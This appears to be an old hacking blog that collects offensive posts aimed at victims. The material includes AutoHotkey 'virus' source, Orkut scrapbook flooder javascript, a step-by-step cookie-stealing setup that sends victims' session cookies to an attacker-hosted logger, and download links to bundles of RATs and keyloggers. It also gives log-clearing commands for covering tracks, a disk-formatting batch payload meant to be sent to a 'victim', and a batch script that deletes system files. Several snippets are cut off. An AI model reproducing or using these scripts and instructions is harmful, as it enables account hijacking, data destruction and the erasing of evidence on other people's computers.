XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
What to do next??
It is now ur job to tell me what u have done next...
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
ORKUT BAN SPYWARE
HERE IT IS SOURCE-:=
Win32.AHK
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
}
return
It is the source code of a virus that blocks Orkut, Youtube and Firefox and shows a message as under,if you try to open either of the two websites :
"ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!"
It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder.Now use a registry cleaner to delete the registry keys made by this virus.That's it,you've done it!!!
Win32.AHK
ifwinactive ahk_class IEFrame
{
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
}
return
It is the source code of a virus that blocks Orkut, Youtube and Firefox and shows a message as under,if you try to open either of the two websites :
"ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? MUHAHAHA!!"
It makes a folder named heap41a in the C:\ drive with attributes S (System file) and H (Hidden file).If your pc is infected by this virus then just boot it in safe mode,goto cmd prompt and at C:\> type attrib -S -H heap41a to make this folder visible and then just delete this folder.Now use a registry cleaner to delete the registry keys made by this virus.That's it,you've done it!!!
scrap book flooders
javascript:text=prompt("enter text to be flooded","Like THis");oa=0;function scrapflood(){oa=oa+1;document.getElementsByTagName('textarea')[0].value=text+"\n"+oa;_writeScrap(document.forms[2], 'submit', '');}void(window.setInterval(scrapflood,640));
javascript: i=0;nb=document.body.innerHTML.match(/\w+\/\d+\/(\d+).jpg/i)[1];nb1=document.getElementsByTagName('TEXTAREA').item(0).value; document.body.innerHTML+='
javascript: i=0;nb=document.body.innerHTML.match(/\w
cookies monster........
how to use cookie monster
...
Lets start and Make the ultimate cookie exploit to hack Orkut.........
1.Go to lenhost.info . make a free Hosting account .
2.It will mail u all the details as ftp / My Sql username and password
3. Download install.php from here
http://rapidshare.com/files/53318259/in
4. Upload this file on the server and run .
5 . It will Open as : a Installer
6. Fill the Coloums :
Database : its something like username_name
For this go to mysql and make a db .
Password : Your Password
User : sent to u by mail
Table : Give any name in this column
Server : This is found in mysql
Admin Password : Provide a pass to access admin area
Once you are done select Submit .
7. Next page in the end show u some links get the 4th link
8.javascript:document.location='http://
Replace My link wid urs in the above javascript.
9. Done send it to ur victim when victim runs this his cookies gets stolen
10. Recieving cookies open admin area http://name.lenhost.info/logmonster.php it asks for the pass login wid the pass u provided during installation.
[TRICK] Updating MP On MCE
would like to share with you.Well I had a genuine MCE,
I downloaded the MP11, the day it was
released,but I wasn't able to install that
on my other PC, that was running on MCE,
well I was disappointed for not able to test it.
Then after some months M$ came up,
with the roll back patch of 20-30 MB,
for MCE.But I managed to install MP11 in my MCE PC,
without any such patch.Here is a very simple tweak.
Make sure you're using a genuine MCE,
if it is not a genuine one, then make it
Extract the setup cabinet of MP11,
with winrar or winzip.
You'll find some files there,
out of these run these files.
umdf.exe
wmdbexport.exe
wmfdist11.exe
wmp11.exe
make sure to run them in same order.
Logoff and login, you're MP is updated
Friday, June 20, 2008
lock any kind of data widout any software...
lock any kind of data widout any software...
open notepad...
dan copy paste below....and save any name but extention.bat compulsarY
when u saved but type ur password which u wanna keep..in dat blue space in notpad
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==pass goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Rapidshare Point Increaser and Hacker Tools
Rapidshare Point Increaser and Hacker Tools
http://i58.photobucket.com/albums/g259/nickduncan/12.jpg
Main Window:
-speed [pts/hour]. -How many points you collected this session [and time].
-How many did you download last 5 days [for the 25gig limit].
Settings:
-Select your RS account Type [Collector or Premium] -
-Choose if you want to launch it on startup.
-If you want to launch it minimized.
-If you want to display a TrayTooltip [Right bottom corner] which appear when you get points [how many] with which account, and total collected.
-You need to fill your account infos to acess to this program.
History:
Here you can acess to your collected Points per day history.
It obviously needs to be active on that day to know how many points did you collected
TESTED
http://rapidshare.com/files/73908151/Rapidshare_get_points.rar
pass:
xeniumstudio
for those who have premium account.
Main Window:
-speed [pts/hour]. -How many points you collected this session [and time].
-How many did you download last 5 days [for the 25gig limit].
Settings:
-Select your RS account Type [Collector or Premium] -
-Choose if you want to launch it on startup.
-If you want to launch it minimized.
-If you want to display a TrayTooltip [Right bottom corner] which appear when you get points [how many] with which account, and total collected.
-You need to fill your account infos to acess to this program.
History:
Here you can acess to your collected Points per day history.
It obviously needs to be active on that day to know how many points did you collected
TESTED
http://rapidshare.com/files/73908151/Ra
pass:
xeniumstudio
for those who have premium account.
Ultimate Hacking Experience 2007
Ultimate Hacking Experience 2007
Trojan Horses
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy
Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner
WebHacks/WordLists
Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix
CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
Virus!
Viruses
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ
Virus Builders
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus
MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger
Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack
Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2
EXTRA!
- Telnet Tutorial
Download:
http://rapidshare.com/files/48633297/UltimateHacking2007.rar.html
Password:
errorised
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy
Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner
WebHacks/WordLists
Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix
CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
Virus!
Viruses
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ
Virus Builders
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus
MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger
Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack
Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2
EXTRA!
- Telnet Tutorial
Download:
http://rapidshare.com/files/48633297/Ul
Password:
errorised
How hackers can erase their tracks after hacking
How hackers can erase their tracks after hacking
Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.Here are some of the techniques that an attacker can use to cover his tracks:-
(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access.
Just point it at the victim’s system as follows:
C:\>auditpol \\192.168.10 /disable
Auditing Disabled
(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.
It is used as follows:
Elsave -s \\192.168.13.10 -1 “Security” -C
(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.
Format your HD!
Format your HD!
Format A:/
01100110011011110111001001101101011000010111010000 10000001100001001110100101110000100000001011110101 00010010111101011000
Format C:/
01100110011011110111001001101101011000010111010000 10000001100011001110100101110000100000001011110101 00010010111101011000
Format D:/
01100110011011110111001001101101011000010111010000 10000001100100001110100101110000100000001011110101 00010010111101011000
Try to kill Harddisk
01001011000111110010010101010101010000011111100000
Boot Failure
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011 10100101110001100010011011110110111101110100001011 10011010010110111001101001
Now save your notepad as .bat file and send it to ur victim. Once ur victim clicks on that bat file. Dhooooooooommmm!!!!!!!!!!
Save on notepad as rinse.bat and then double click on it.
0110011001101111011100100110110101100001
Format C:/
0110011001101111011100100110110101100001
Format D:/
0110011001101111011100100110110101100001
Try to kill Harddisk
0100101100011111001001010101010101000001
Boot Failure
0110010001100101011011000010000000101111
Now save your notepad as .bat file and send it to ur victim. Once ur victim clicks on that bat file. Dhooooooooommmm!!!!!!!!!!
Save on notepad as rinse.bat and then double click on it.
Viruses for Irritating (plz dont try on ur pc)
Viruses for Irritating (plz dont try on ur pc)
@echo off@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE JOHN hacked your IP.exe"
Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"
Try this on any other comp.. Very heavy Virus..
Subscribe to:
Posts (Atom)